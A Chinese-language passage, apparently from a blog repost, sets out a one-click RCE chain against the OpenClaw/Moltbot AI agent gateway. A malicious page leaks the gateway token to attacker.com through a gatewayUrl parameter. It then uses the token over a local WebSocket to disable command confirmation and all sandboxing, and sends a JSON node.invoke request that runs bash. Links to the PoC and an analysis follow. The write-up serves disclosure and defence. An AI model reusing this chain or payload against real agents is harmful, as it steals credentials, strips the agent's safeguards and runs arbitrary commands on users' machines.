-
受害者访问attacker.com(实际上是一个不起眼的网址) -
客户端 JavaScript 代码attacker.com在受害浏览器上执行,打开一个后台窗口http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080。这会将身份验证令牌发送到目标服务器。attacker.com:8080 -
attacker.com受害者浏览器上执行的客户端 JavaScript 代码会创建一个 WebSocket 连接ws://localhost:18789(默认的 OpenClaw 服务器配置),并使用窃取的令牌进行身份验证。然后,它会向以下 API 发送请求:
-
禁用危险命令的用户确认 -
禁用所有沙盒 -
最后,为了实现任意命令执行,攻击者的 JavaScript 代码会执行以下node.invoke请求: { "type": "req", "id": "4", "method": "node.invoke", "params": { "nodeId": "main", "command": "system.run", "params": { "cmd": "bash -c 'echo hacked > /tmp/hacked'" }, "timeoutMs": 60000, "idempotencyKey": "rev1" } }POC: https://github.com/ethiack/moltbot-1click-rce 文章分析: https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END





暂无评论内容